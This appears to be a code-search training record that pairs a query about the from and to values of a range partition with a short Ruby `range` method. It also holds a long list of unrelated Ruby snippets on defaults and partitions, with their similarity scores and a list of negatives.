"def reset_default_annotation(study:)\n current_default = study.default_annotation\n annot_name, annot_type, annot_scope = current_default&.split('--')\n case annot_scope\n when 'study'\n current_default = nil if study.cell_metadata.by_name_and_type(annot_name, annot_type).nil?\n when 'cluster'\n cluster = study.default_cluster\n annotation = cluster&.cell_annotations&.detect { |ca| ca[:name] == annot_name && ca[:type] == annot_type }\n current_default = nil if cluster.nil? || annotation.nil?\n else\n current_default = nil\n end\n if study.default_annotation != current_default\n study.default_options[:annotation] = current_default\n study.save\n end\n end",
"def set_study_default_options\n @default_cluster = @study.default_cluster\n @default_cluster_annotations = {\n 'Study Wide' => @study.study_metadata.map {|metadata| [\"#{metadata.name}\", \"#{metadata.name}--#{metadata.annotation_type}--study\"] }.uniq\n }\n unless @default_cluster.nil?\n @default_cluster_annotations['Cluster-based'] = @default_cluster.cell_annotations.map {|annot| [\"#{annot[:name]}\", \"#{annot[:name]}--#{annot[:type]}--cluster\"]}\n end\n end",
"def default_values\n\t\tself.max_student ||= 0\n\t\tself.backup_student ||= 0\n\tend",
"def default(default)\n @default = default\n end",
"def default_pri=(v)\n @@default_pri = v\n end",
"def DefaultExtJournalSize(part)\n part = deep_copy(part)\n if Ops.get_symbol(part, \"used_fs\", :unknown) == :ext2\n Builtins.y2milestone(\"No journal on ext2\")\n return 0\n end\n\n ret = 0\n\n part_size = Ops.multiply(1024, Ops.get_integer(part, \"size_k\", 0))\n # default block size is 4k\n bs = Builtins.tointeger(\n Ops.get_string(\n part,\n [\"fs_options\", \"opt_blocksize\", \"option_value\"],\n \"4096\"\n )\n )\n blocks = Ops.divide(part_size, bs)\n\n Builtins.y2milestone(\n \"Partition %1: %2 blocks (block size: %3)\",\n Ops.get_string(part, \"name\", \"\"),\n blocks,\n bs\n )\n\n # values extracted from ext2fs_default_journal_size() function in e2fsprogs sources\n if Ops.less_than(blocks, 2048)\n ret = 0\n elsif Ops.less_than(blocks, 32768)\n ret = 1024\n elsif Ops.less_than(blocks, 256 * 1024)\n ret = 4096\n elsif Ops.less_than(blocks, 512 * 1024)\n ret = 8192\n elsif Ops.less_than(blocks, 1024 * 1024)\n ret = 16384\n else\n # maximum journal size\n ret = 32768\n end\n\n # converts blocks to bytes\n ret = Ops.multiply(ret, bs)\n\n Builtins.y2milestone(\"Default journal size: %1kB\", Ops.divide(ret, 1024))\n\n\n ret\n end",
"def slice_with_default(*keys, default: nil)\n\t\t\t\tkeys.each_with_object(::Hash.new) do |k, hash| \n\t\t\t\t\tif has_key?(k) || default == :default_proc\n\t\t\t\t\t\thash[k] = self[k] \n\t\t\t\t\telse\n\t\t\t\t\t\thash[k] = default\n\t\t\t\t\tend\n\t\t\t\tend\n\t\t\tend",
"def SetSelectedToValid\n @selectedRootPartition = \"\"\n Builtins.foreach(@rootPartitions) do |p, i|\n if Ops.get_boolean(i, :valid, false) && @selectedRootPartition == \"\"\n @selectedRootPartition = p\n end\n end\n\n nil\n end",
"def partition!(id)\n partition(id) || ErrorCode[:unknown_topic_or_partition].raise\n end",
"def default_values\n self.deleted ||= '0'\n end",
"def make_default_only_one_variant\n if self.variant? and self.default_changed?\n # If there are variants other than default variant.\n if self.parent.variants.count > 1\n self.parent.variants.each do |variant|\n variant.update_column(:default, false)\n end\n end\n # Otherwise current or default variant will be true\n self.update_column(:default, true)\n end\n end",
"def set_default_participant\n return if detached # skip if study is detached, which is common in test environment\n\n begin\n path = Rails.root.join('data', self.data_dir, 'default_participant.tsv')\n entity_file = File.new(path, 'w+')\n entity_file.write \"entity:participant_id\\ndefault_participant\"\n entity_file.close\n upload = File.open(entity_file.path)\n ApplicationController.firecloud_client.import_workspace_entities_file(self.firecloud_project, self.firecloud_workspace, upload)\n Rails.logger.info \"#{Time.zone.now}: created default_participant for #{self.firecloud_workspace}\"\n File.delete(path)\n rescue => e\n ErrorTracker.report_exception(e, user, self)\n Rails.logger.error \"Unable to set default participant: #{e.message}\"\n end\n end",
"def default!(index)\n Entity.reset_value(index,@defaults[index.to_s])\n end",
"def default_values\n {name: \"default\", index: -1, experiment_id: nil}\n end",
"def default_cluster_point_size\n if self.default_options[:cluster_point_size].blank?\n 3\n else\n self.default_options[:cluster_point_size].to_i\n end\n end",
"def set_partition\n @partition = Partition.find(params[:id])\n end",
"def select_default_values\n return if @default_value.nil?\n # NOTE list not yet created\n raise \"list has not yet been created\" unless @list\n index = node_to_row @default_value\n raise \"could not find node #{@default_value}, #{@list} \" unless index\n return unless index\n @current_index = index\n toggle_row_selection\n @default_value = nil\n end",
"def set_default\n cmd = \"{\\\"id\\\":8,\\\"method\\\":\\\"set_default\\\",\\\"params\\\":[]}\\r\\n\"\n request(cmd)\n end",
"def default=(new_default)\n @default_proc = nil\n @default = new_default\n end",
"def reset_is_default_flags\n if self.is_default == true\n self.dataset.weights.get_all_but(self.id).update_all(is_default: false)\n end\n end",
"def set_defaults\n self.bucket_agency_allocations = []\n end",
"def default(default)\n @default = default\n self\n end",
"def default=(p0) end",
"def key_partition\n Dynamoid::Config.partitioning? ? \".#{Random.rand(Dynamoid::Config.partition_size)}\" : ''\n end",
"def set_default(key, val)\n set(key, val) unless @config.key?(key)\n end",
"def add_partition_to_node( tp, node )\n\n @nodes_lists_replicas[node][tp] = ''\n @partitions_lists[tp]['replicas'] ||= {}\n @partitions_lists[tp]['replicas'][node] = ''\n end",
"def set_defaults\n end",
"def set_defaults\n end",
"def select_group_loan_to_be_declared_as_default\n setup_select_group_loan\n @default_declarable_group_loans = @office.default_declarable_group_loans\n end",
"def set_vbmanage_machinefolder_default()\n system(\"vboxmanage setproperty machinefolder default\")\n _track_ai_event(__method__, {\n 'vm_name': vm_name\n })\n end",
"def set_default\n @manager.set_default(@entity['id']) if @manager.respond_to?(:set_default)\n end",
"def default=(value)\n @default = value\n end",
"def default_bucket\n @default_bucket ||= buckets.uncategorised.first || buckets.uncategorised.create!(name: 'Uncategorised')\n end",
"def partitioned_state\n super\n end",
"def defaults\n owner.volume(:root).reverse_merge!({\n :device => '/dev/sda1',\n :mount_point => '/',\n :mountable => false,\n })\n self.reverse_merge!({\n :availability_zones => ['us-east-1d'],\n :backing => 'ebs',\n :flavor => 't1.micro',\n })\n super\n end",
"def deferred_defaults\n set_default_path\n set_default_properties\n end",
"def set_default\n @manager.set_default(entity['id']) if @manager.respond_to?(:set_default)\n end",
"def reset_is_default_flags\n if self.is_default == true\n self.time_series.weights.get_all_but(self.id).update_all(is_default: false)\n end\n end",
"def set_defaults\n\n end",
"def set_defaults\n\n end",
"def set_defaults\n\n end",
"def set_defaults\n\n end",
"def set_defaults\n\n end",
"def set_defaults\n\n end",
"def set_default_values\n self.class.defaults.each do |key, default|\n self[key] ||= default\n end\n end",
"def default!\n clear.merge!(defaults)\n end",
"def assign_default(config)\n assign(config, default)\n reset\n config\n end",
"def default_broker=(broker)\n broker = find_broker(broker)\n raise BrokerNotInUseError, 'Default broker must be in use' unless broker_in_use?(broker)\n\n @default_broker = broker\n end",
"def set_default!\n @@default_user = self\n end",
"def preset_default_values( params_hash = {} )\n # XXX AmbGest 1.10 does not have a Firm entity:\n# unless self.firm\n# begin\n# if self.user_id and (default_firm_id = LeUser.find(self.user_id).firm_id)\n# self.firm_id = default_firm_id\n# end\n# rescue\n# self.firm_id = nil\n# end\n# end\n # Set default date for this entry:\n# self.date_last_met = Time.now unless self.date_last_met\n self\n end",
"def default\n @what = :default\n self\n end",
"def reset_default\n \n w=WinReg.new(@file)\n w.debug=@debug\n FOLDER_DEFAULTS.each do |key|\n w.write_key(FOLDERS_BASE+'\\\\'+key[:name],PROFILE_BASE+'\\\\'+key[:dir])\n end\n end",
"def supports_default_partitions?\n postgresql_version >= 110_000\n end",
"def default\n by_id(default_id)\n end",
"def default=(_); end",
"def add!(partition, dirty = false)\n if @list[partition.name].nil?\n @list[partition.name] = partition\n else\n @list[partition.name].merge!(partition, simulate = false, dirty)\n end\n self\n end",
"def default_value \n self[:value] ||= {}\n self[:value][:default_value] ||= []\n self[:value][:default_value].delete('-1')\n self[:value][:default_value]\n end",
"def default=( val )\r\n @opts[:default] = val\r\n end",
"def freeze\n @default_values.freeze\n super\n end",
"def set_default(key, *args, &block)\n set(key, *args, block) unless settings.send(:local?, key.to_sym)\n end",
"def default_queue=(queue)\n @queues[nil] = queue\n end",
"def default=(value)\n self.value = value\n @default = value\n end",
"def default_schema\n nil\n end",
"def as_default!\n self.class.default.all.update_all(priority: self.class.priorities[:common])\n self.default!\n self\n end",
"def initialize(partition_data)\n @partition_data = partition_data\n end",
"def default_entry\n nil\n end",
"def set_default_values\n if self.price.nil?\n self.price = 0.0\n end\n if self.rating.nil?\n self.rating = 0\n end\n if self.enabled.nil?\n self.enabled = false\n end\n if self.no_of_reviews.nil?\n self.no_of_reviews = 0\n end\n if self.no_of_registrations.nil?\n self.no_of_registrations = 0\n end\n end",
"def default_vocabulary(uri)\n @default_vocabulary = uri\n end",
"def set_default_values\n self.points_log ||= POINTS_LOG\n self.points_log_first_of_day ||= POINTS_LOG_FIRST_OF_DAY\n self.points_peer_assessment ||= POINTS_PEER_ASSESSMENT\n self.points_peer_assessment_first_of_team ||= POINTS_PEER_ASSESSMENT_FIRST_OF_TEAM\n self.points_project_evaluation ||= POINTS_PROJECT_EVALUATION\n self.points_project_evaluation_first_of_team ||= POINTS_PROJECT_EVALUATION_FIRST_OF_TEAM\n self.max_logs_per_day ||= MAX_LOGS_PER_DAY\n self.points_project_evaluation_submitted_first_day ||= POINTS_PROJECT_EVALUATION_SUBMITTED_FIRST_DAY\n self.points_peer_assessment_submitted_first_day ||= POINTS_PEER_ASSESSMENT_SUBMITTED_FIRST_DAY\n self.marking_algorithm_id ||= MARKING_ALGORITHM_ID\n end",
"def configured_default\n @options[:default] || default_entry\n end",
"def set_default_annotation\n return if study.default_options[:annotation].present?\n\n cell_metadatum = study.cell_metadata.keep_if(&:can_visualize?).first || study.cell_metadata.first\n cluster = study.cluster_groups.first\n if cluster.present?\n cell_annotation = cluster.cell_annotations.select { |annot| cluster.can_visualize_cell_annotation?(annot) }\n .first || cluster.cell_annotations.first\n else\n cell_annotation = nil\n end\n annotation_object = cell_metadatum || cell_annotation\n return if annotation_object.nil?\n\n if annotation_object.is_a?(CellMetadatum)\n study.default_options[:annotation] = annotation_object.annotation_select_value\n is_numeric = annotation_object.annotation_type == 'numeric'\n elsif annotation_object.is_a?(Hash) && cluster.present?\n study.default_options[:annotation] = cluster.annotation_select_value(annotation_object)\n is_numeric = annotation_object[:type] == 'numeric'\n end\n study.default_options[:color_profile] = 'Reds' if is_numeric\n end",
"def default(duplicate=true)\n duplicate && @dup ? @default.dup : @default\n end",
"def init_default_settings!\n self.class.default_settings.dup.each do |var, vals|\n setting_objects.detect { |s| s.var == var.to_s } || setting_objects.create(var: var.to_s, value: vals, target: self)\n end\n end",
"def set_default\n (!default || value?) ? self : add_value(default)\n end",
"def default\n @type = :default\n end",
"def set_defaults\n self.copied = self.copied.nil? ? false : self.copied\n end",
"def reset_defaults; end",
"def reset\n set(default_preferences)\n end",
"def reset_default_fields\n self.cleared_default_fields.each do |k, v|\n self.send(\"#{k}=\", v)\n end\n end",
"def set_default_role!\n clear!\n end",
"def set_default_role!\n clear!\n end"
] |
[
"0.61621904",
"0.5887786",
"0.5762772",
"0.5762772",
"0.5732178",
"0.5605029",
"0.5546228",
"0.5460707",
"0.5460707",
"0.54267246",
"0.5426431",
"0.5386847",
"0.53852624",
"0.5381668",
"0.53813004",
"0.5363579",
"0.5362803",
"0.53579223",
"0.5354793",
"0.5327952",
"0.53276473",
"0.53261316",
"0.52958196",
"0.52929384",
"0.5262935",
"0.52559614",
"0.5253238",
"0.52413017",
"0.52311766",
"0.52284706",
"0.52034116",
"0.52003294",
"0.51976514",
"0.5191842",
"0.5190469",
"0.51442647",
"0.5133373",
"0.5129859",
"0.51289403",
"0.5125674",
"0.5122097",
"0.5121859",
"0.51191133",
"0.51189744",
"0.5112984",
"0.5109241",
"0.5109241",
"0.5105047",
"0.50981134",
"0.5093653",
"0.50909334",
"0.5087907",
"0.5081659",
"0.5081019",
"0.5080252",
"0.5072293",
"0.50549334",
"0.50432825",
"0.50432825",
"0.50432825",
"0.50432825",
"0.50432825",
"0.50432825",
"0.50410193",
"0.503774",
"0.5031334",
"0.50275034",
"0.5018169",
"0.5014074",
"0.50098777",
"0.50094974",
"0.50037736",
"0.5002709",
"0.49829292",
"0.49823698",
"0.49793628",
"0.49695605",
"0.49639505",
"0.4962265",
"0.49611518",
"0.4957069",
"0.49536648",
"0.49532884",
"0.49512494",
"0.49499235",
"0.49462658",
"0.4946219",
"0.4946046",
"0.49459943",
"0.49387854",
"0.4913255",
"0.49023947",
"0.49005437",
"0.48940918",
"0.48921835",
"0.4890158",
"0.4881076",
"0.4875604",
"0.48724183",
"0.48724183"
] |
0.5201624
|
31
|
The from and to values of this partition for a range partition.
|
def range
[@from, @to]
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def range\n (@from..@to)\n end",
"def range\n @from..@to\n end",
"def collect\n [@range_low, @range_high]\n end",
"def range\n\t\t\t#(@end > @start) ? (@start .. @end) : (@end .. @start)\n\t\t\t(start .. self.end)\n\t\tend",
"def ranges\n attributes.fetch(:ranges)\n end",
"def from_ranges\n attributes.fetch(:fromRanges)\n end",
"def m_range\r\n end",
"def values(range = nil)\n result_unflatten = if !::RANGES_JRUBY_BUG\n map { |x| x.v }\n else\n self.v\n end\n result = result_unflatten.flatten\n if range\n relevant_result = []\n result.each_with_index { |row_or_column, i| relevant_result << row_or_column if range.include?(i) }\n relevant_result\n else\n result\n end\n end",
"def range(from, to)\n from_query(raw_range(from, to))\n end",
"def range\n min, max = span\n min..max\n end",
"def range \n Range.new(@first, @last)\n end",
"def ranges\n pairs.map { |b, e| (b...e) }\n end",
"def to_range\n min .. max\n end",
"def range\n attributes.fetch(:range)\n end",
"def range\n attributes.fetch(:range)\n end",
"def range\n attributes.fetch(:range)\n end",
"def range\n attributes.fetch(:range)\n end",
"def to_range\n Range.new(self.start, self.end)\n end",
"def range( range )\n ::Vector.elements( range.to_a )\n end",
"def to_range\n (@start_date..@end_date)\n end",
"def ranges\n x_start, y_start = absolute(0, 0)\n x_end, y_end = absolute(@diameter - 1, @diameter - 1)\n\n [x_start..x_end, y_start..y_end]\n end",
"def to_range\n start_date..end_date\n end",
"def range\n @range ||= set_range\n end",
"def split_range(range)\n start, finish = range.begin, range.end\n start += length if start < 0\n finish += length if finish < 0\n \n [start, finish - start - (range.exclude_end? ? 1 : 0)]\n end",
"def to_ranges args = Hash.new\n min = args[:min] || -Infinity\n max = args[:max] || Infinity\n collapse = args[:collapse]\n \n ranges = Array.new\n self.split(%r{\\s*,\\s*}).each do |section|\n md = section.match(RANGE_REGEXP)\n next unless md\n \n from = _matchdata_to_number md, 1, min\n to = _has_matchdata?(md, 2) ? _matchdata_to_number(md, 3, max) : from\n\n prevrange = ranges[-1]\n\n if collapse && prevrange && prevrange.include?(from - 1) && prevrange.include?(to - 1)\n ranges[-1] = (prevrange.first .. to)\n else\n ranges << (from .. to)\n end\n end\n\n ranges\n end",
"def range(range)\n opts[:min] = range.begin\n opts[:max] = range.end\n end",
"def compute_local_range()\n begin_index = time2index(local_range.begin)\n end_index = time2index(local_range.end, -1) # FIXME this gives an unreachable index causing Exceptions down the line...\n begin_index..end_index\n end",
"def to_range\n\t\tIP.parse(self.start_ip)..IP.parse(self.end_ip)\n\tend",
"def range; end",
"def range; end",
"def range; end",
"def &(range)\n return nil unless overlaps?(range) || touching?(range)\n PosRange.new [@start, range.start].max, [@end, range.end].min\n end",
"def range=(range)\n @range = range\n end",
"def vt_range\n ARange.new(vtstart_at, vtend_at)\n end",
"def range(data)\n return (minimum(data)..maximum(data))\n end",
"def range\n from_truncated..to_truncated\n end",
"def range=(range)\n @range = range\n end",
"def get_range(from, to, options = {})\n if options.delete(:include_boundaries)\n connection.zrevrangebyscore(key_label, to, from, options)\n else\n connection.zrevrangebyscore(key_label, \"(#{to}\", \"(#{from}\", options)\n end\n end",
"def get_bounds\n [ @min, @max ]\n end",
"def offset_range\n return nil unless original_tag\n if original_end_tag\n end_offset = end_pos.offset + original_end_tag.bytesize\n else\n end_offset = start_pos.offset + original_tag.bytesize\n end\n\n start_pos.offset...end_offset\n end",
"def range(range)\n assert_range range\n schema do |s|\n s.type range.begin.is_a?(Integer) ? 'integer' : 'number'\n s.minimum range.begin\n s.maximum range.end, exclusive: range.exclude_end? unless range.end.nil?\n end\n end",
"def divide_range_into_values(range_size, start_value, end_value, is_derived_values = true)\n values = []\n # How big is x-range? What should the step size be?\n # Generally we want a hundred display points. Let's start there.\n if range_size < 1.1\n step_size = is_derived_values ? 0.01 : 0.1\n elsif range_size < 11\n step_size = is_derived_values ? 0.1 : 1\n elsif range_size < 111\n step_size = is_derived_values ? 1 : 10\n elsif range_size < 1111\n step_size = is_derived_values ? 10 : 100\n elsif range_size < 11111\n step_size = is_derived_values ? 100 : 1000\n elsif range_size < 111111\n step_size = is_derived_values ? 1000 : 10000\n else \n step_size = is_derived_values ? 10000 : 100000\n end\n grid_x = start_value\n while grid_x < end_value\n values << grid_x\n grid_x = grid_x + step_size\n end\n values\n end",
"def _range from, to\n\t\trange = `IDBKeyRange.bound(#{from}, #{to})`\n\t\tEnumerator.new do |out, done|\n\t\t\ttry do\n\t\t\t\ttransaction = `#@db.transaction(['kv'], 'readonly')`\n\t\t\t\tstore = `#{transaction}.objectStore('kv')`\n\t\t\t\tindex = `#{store}.index('key')`\n\t\t\t\t%x{#{index}.openCursor(#{range}).onsuccess = function(e) {\n\t\t\t\t\tvar cursor = e.target.result\n\t\t\t\t\tif(cursor) {\n\t\t\t\t\t\t// #{log `cursor.value.key`, `cursor.value.val`}\n\t\t\t\t\t\t// debugger\n\t\t\t\t\t\t#{out << [`cursor.value.key`, `cursor.value.val`]}\n\t\t\t\t\t\tcursor.continue()\n\t\t\t\t\t} else {\n\t\t\t\t\t\t#{done[]}\n\t\t\t\t\t}\n\t\t\t\t}}\n\t\t\tend\n\t\tend.lazy\n\tend",
"def range(start, stop)\n fetch(key.call(\"LRANGE\", start, stop))\n end",
"def get_range(line_from, index_from, line_to, index_to) \n\t\tix1 = index_of_position(line_from, index_from)\n\t\tix2 = index_of_position(line_to, index_to)\n\t\t@text[ix1 ... ix2]\n\tend",
"def range\n DEFAULT_RANGE\n end",
"def range\n DEFAULT_RANGE\n end",
"def range\n DEFAULT_RANGE\n end",
"def set_range\n ref_gene = ref_genes.first\n [ref_gene.txStart, ref_gene.txEnd]\n end",
"def to_range\n case\n when open?, unknown?\n nil\n else\n Range.new(unknown_start? ? Date.new : @from, max)\n end\n end",
"def range_start; range.first; end",
"def range\n @cached_range ||= get_range\n end",
"def cell_range= range\n start_cell, end_cell = range.split(\":\")\n unless start_cell.nil? || start_cell.match(/^[a-zA-Z]+[1-9][0-9]*$/).nil?\n start_cell = start_cell.upcase\n self.start_column, self.start_row = from_alpha(start_cell.sub(/[0-9]+/,\"\")), start_cell.sub(/[A-Z]+/,\"\").to_i\n self.end_column, self.end_row = nil, nil\n if end_cell.nil?\n self.end_column = self.start_column\n self.end_row = self.start_row\n else\n end_cell = end_cell.upcase\n unless end_cell.match(/^[a-zA-Z]+[1-9][0-9]*$/).nil?\n self.end_column, self.end_row = from_alpha(end_cell.sub(/[0-9]+/,\"\")), end_cell.sub(/[A-Z]+/,\"\").to_i\n else\n start_row = nil\n end\n end\n else\n start_row = nil\n end\n end",
"def query_range(left, right)\n \n end",
"def query_range(left, right)\n \n end",
"def range_value\n string_value\n end",
"def query(from, to)\n low = [from, to].min\n high = [from, to].max\n \n # Get the values\n values = self[low..high]\n \n # Allow crick querying\n values.reverse! if from > to\n return values\n end",
"def sliced_print_range\n whole_range = (@lower..@upper).to_a\n whole_range.each_slice(@size).to_a\n end",
"def parse_range\n val = super || return\n val.begin == val.end ? val.begin : val\n end",
"def tt_range\n ARange.new(ttstart_at, ttend_at)\n end",
"def selection_range(from, to)\n execute(:selection, :range, from, to)\n end",
"def d_range\n (d...dn_position).to_a\n end",
"def d_range\n (d...dn_position).to_a\n end",
"def rdfs_range\n end",
"def range\n (start_date...end_date) #exclusive date range\n end",
"def enterprise_i_p_ranges\n return @enterprise_i_p_ranges\n end",
"def boundaries\n [intervals.first[0], intervals.last[1]]\n end",
"def declare_beg_range\n\t\t@beg_range = @beg_range.to_date \n\t\t@end_range = @end_range.to_date \n\tend",
"def to_s\n @_range\n end",
"def bsearch_range (range = 0 ... self.length, &block)\r\n lower = bsearch_lower_boundary(range, &block)\r\n upper = bsearch_upper_boundary(range, &block)\r\n return lower ... upper\r\n end",
"def search_range(array, range=nil, &block)\n lower = search_lower_boundary(array, range, &block)\n upper = search_upper_boundary(array, range, &block)\n return lower ... upper\n end",
"def range(arr)\n\nend",
"def range_map\n @range_map ||= ranges.inject({}) do |res, (key, value)|\n range = value.split('-').map(&:to_i)\n res.merge! key => Range.new(range.first, range.last)\n end\n end",
"def origin\n range.low\n end",
"def range(*args)\n value = \"[\"\n args.each_slice(2) do |from, to|\n from = sanitize(from)\n to = sanitize(to)\n value += \"#{from}-#{to}\"\n end\n value += \"]\"\n append value\n end",
"def between from_key, to_key\n from(from_key).to(to_key, inclusive: true)\n end",
"def get_range(range)\n r = []\n enum = range.to_enum\n begin\n while (x = enum.next) < @size\n r << get_single_key(x)\n end\n rescue StopIteration\n end\n r.empty? ? nil : r\n end",
"def relevant_range\n if (first_partition = current_partitions.min)\n # Case 1: First partition starts with MINVALUE, i.e. from is nil -> start with first real partition\n # Case 2: Rather unexpectedly, first partition does not start with MINVALUE, i.e. from is not nil\n # In this case, use first partition beginning as a start\n min_date = first_partition.from || first_partition.to\n end\n\n if pruning_old_partitions?\n min_date ||= oldest_active_date\n end\n\n # In case we don't have a partition yet\n min_date ||= Date.today\n min_date = min_date.beginning_of_month\n\n max_date = Date.today.end_of_month + HEADROOM\n\n [min_date, max_date]\n end",
"def size_range(range)\n return [1,1] if range.nil?\n from = range.from\n to = range.to\n x = from.nil? ? 1 : from\n y = to.nil? ? TheInfinity : to\n [x, y]\n end",
"def map_value(val, from_range, to_range)\n orig_range = [1, (from_range[1] - from_range[0]).abs].max\n new_range = [1, (to_range[1] - to_range[0]).abs].max\n\n ((val.to_f - from_range[0]) / orig_range) * new_range + to_range[0]\n end",
"def maps_for_range(range)\n last = (range.exclude_end?) ? range.last : range.last + 1\n maps.select { |m| m.start_addr >= range.first and m.max < last }\n end",
"def restrict(value, range)\n [[value, range.first].max, range.last].min\n end",
"def get_range(key1, key2)\n @store_.get_range(key1, key2)\n end",
"def range(column)\n min(column)..max(column)\n end",
"def timestamp_range from, to\n range_grpc = Google::Cloud::Bigtable::V2::TimestampRange.new\n range_grpc.start_timestamp_micros = from if from\n range_grpc.end_timestamp_micros = to if to\n @grpc.timestamp_range_filter = range_grpc\n self\n end",
"def span\n span_min = @locations.min { |a,b| a.from <=> b.from }\n span_max = @locations.max { |a,b| a.to <=> b.to }\n return span_min.from, span_max.to\n end",
"def report_range\n return @report_range\n end",
"def getIndexRange()\n rangeTime = { :min => nil, :max => nil} ;\n rangeX = { :min => nil, :max => nil} ;\n rangeY = { :min => nil, :max => nil} ;\n rangeZ = { :min => nil, :max => nil} ;\n @sumGridTable.keys.sort.each{|index|\n rangeTime[:min] = safeMin(index[0], rangeTime[:min]) ;\n rangeTime[:max] = safeMax(index[0], rangeTime[:max]) ;\n rangeX[:min] = safeMin(index[1][0], rangeX[:min]) ;\n rangeX[:max] = safeMax(index[1][0], rangeX[:max]) ;\n rangeY[:min] = safeMin(index[1][1], rangeY[:min]) ;\n rangeY[:max] = safeMax(index[1][1], rangeY[:max]) ;\n rangeZ[:min] = safeMin(index[1][2], rangeZ[:min]) ;\n rangeZ[:max] = safeMax(index[1][2], rangeZ[:max]) ;\n }\n return [rangeTime, rangeX, rangeY, rangeZ] ;\n end",
"def get_range_parts(range)\n if range =~ /([' a-zA-Z]+!)?([A-Z]+\\d+):([A-Z]+\\d+)/\n sheet = $1\n range1 = $2\n range2 = $3\n if sheet\n sheet = sheet[0..sheet.size-2]\n if sheet =~ /'(.+)'/\n sheet = $1\n end\n end\n return [sheet, range1, range2]\n end\n nil\n end",
"def interval(from, to)\n return EmptyList if from > to\n interval_exclusive(from, to.next)\n end",
"def split(range = nil)\n if self.record_category and self.activity?\n entry_end = self.end_timestamp || Time.now\n time = range ? [self.timestamp, range.begin.midnight.in_time_zone].max : self.timestamp\n end_time = range ? [entry_end, range.end.midnight.in_time_zone].min : entry_end\n list = Array.new\n while time < end_time\n new_end = [entry_end, (time + 1.day).midnight.in_time_zone].min\n list << [time, new_end, self]\n time = new_end\n end\n else\n return [self.timestamp, nil, self]\n end\n list\n end",
"def interval\n @to.to_i - @from.to_i\n end",
"def selection_range\n attributes.fetch(:selectionRange)\n end",
"def to_a\n get_range('-inf', '+inf', include_boundaries: true)\n end",
"def emit_range\n emit_finish_mutations\n emit_start_mutations\n end",
"def to_range_within(range)\n nb_weeks_offset = self.weekly_recurring ? ((range.end - self.starts_at.to_datetime) / 7).to_i : 0\n r = Range.new(self.starts_at + nb_weeks_offset.week, self.ends_at + nb_weeks_offset.week)\n range.cover?(r.begin)&&range.cover?(r.end) ? r : nil\n end",
"def get_range_by_rank(from, to, options = {})\n connection.zrevrange(key_label, from, to, options)\n end",
"def range(range_start, range_end, end_reached_cb=nil)\n if range_start == nil\n result = XML.new(name, attrs)\n else\n result = nil\n end\n @contents.each {|c|\n # end reached !\n if range_end and c.object_id == range_end.object_id\n end_reached_cb.call if end_reached_cb\n break\n end\n # start reached !\n if range_start and c.object_id == range_start.object_id\n result = XML.new(name, attrs)\n next\n end\n if result # We already started\n if c.is_a? XML\n break_me = false\n result.add! c.range(nil, range_end, lambda{ break_me = true })\n if break_me\n end_reached_cb.call if end_reached_cb\n break\n end\n else # String/XML_PI/XML_Comment\n result.add! c\n end\n else\n # Strings/XML_PI/XML_Comment obviously cannot start a range\n if c.is_a? XML\n break_me = false\n r = c.range(range_start, range_end, lambda{ break_me = true })\n if r\n # start reached !\n result = XML.new(name, attrs, r)\n end\n if break_me\n # end reached !\n end_reached_cb.call if end_reached_cb\n break\n end\n end\n end\n }\n return result\n end",
"def ranges\n @toc_id = 'ranges'\n end",
"def parsed_range(splits)\n last_tuple = splits.pop\n body_of(splits) + head_of(last_tuple)\n end"
] |
[
"0.7436858",
"0.72955906",
"0.72890246",
"0.69145817",
"0.6898283",
"0.68982786",
"0.68723494",
"0.68503475",
"0.6847249",
"0.6791602",
"0.6756868",
"0.6735238",
"0.6723739",
"0.6713718",
"0.6713718",
"0.6713718",
"0.6713718",
"0.66967636",
"0.6638313",
"0.66310805",
"0.6552379",
"0.6547579",
"0.65333164",
"0.65282995",
"0.65166855",
"0.64559317",
"0.6454633",
"0.6398449",
"0.63866156",
"0.63866156",
"0.63866156",
"0.6351912",
"0.63272804",
"0.63260055",
"0.6315781",
"0.6307502",
"0.62840307",
"0.62818086",
"0.62480646",
"0.6244088",
"0.62085193",
"0.6200179",
"0.6192482",
"0.6173063",
"0.61647415",
"0.6158994",
"0.6158994",
"0.6158994",
"0.6138675",
"0.6129658",
"0.612753",
"0.61231935",
"0.6122466",
"0.6087128",
"0.6087128",
"0.6082675",
"0.6080066",
"0.60667187",
"0.60589683",
"0.60539377",
"0.6030097",
"0.6029009",
"0.6029009",
"0.60081536",
"0.6004633",
"0.59996605",
"0.5998494",
"0.59883386",
"0.5988088",
"0.59850913",
"0.59698945",
"0.5969657",
"0.59676313",
"0.59563804",
"0.5953022",
"0.59421706",
"0.59384173",
"0.593453",
"0.5927297",
"0.5910727",
"0.58984536",
"0.5895067",
"0.587422",
"0.58740896",
"0.58711505",
"0.58701235",
"0.5854783",
"0.5854187",
"0.5852956",
"0.5851221",
"0.5841029",
"0.58396715",
"0.5838297",
"0.5832576",
"0.5829179",
"0.58199775",
"0.58134663",
"0.5798695",
"0.57854927",
"0.578399"
] |
0.81356955
|
0
|
The values to include in this partition for a list partition.
|
def list
@in
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def GetPartitionList\n deep_copy(@partition_info)\n end",
"def partition_list()\nend",
"def sites\n @list.map {|partition_name, partition| partition.sites.map {|site| {site => partition_name} }}.flatten(1)\n end",
"def all\n @list.values\n end",
"def values\n @values ||= []\n end",
"def values\n end",
"def values\n @values ||= []\n end",
"def values; end",
"def values; end",
"def values; end",
"def values; end",
"def values; end",
"def values; end",
"def values; end",
"def values() end",
"def values\n []\n end",
"def values\n entries.map {|e| e.value }\n end",
"def values\n @values\n end",
"def values\n self\n end",
"def values\n return @values\n end",
"def values\n return @values\n end",
"def values\n return @values\n end",
"def values\n self[:values]\n end",
"def list_values(bn, lists)\n raise \"no list\" unless lists.has_key?(bn)\n first, rest = lists[bn][RDF.first], lists[bn][RDF.rest]\n (rest == RDF.nil ? [] : list_values(rest, lists)).unshift(first)\n rescue\n lists.delete(bn)\n raise $!\n end",
"def parts\n unless defined?(@parts)\n @parts = values_array\n @parts.pop while @parts.size > 1 && @parts.last == 0\n end\n @parts\n end",
"def values\n @@values\n end",
"def values\n end",
"def values\n list = []\n each_value{|value| list << value}\n list\n end",
"def items\n @lists.collect(&:items).flatten\n end",
"def partition(&block)\n return to_enum :partition unless block\n\n ary_T = []\n ary_F = []\n self.each{|*val|\n if block.call(*val)\n ary_T.push(val.__svalue)\n else\n ary_F.push(val.__svalue)\n end\n }\n [ary_T, ary_F]\n end",
"def values(*) end",
"def values\n @values.values\n end",
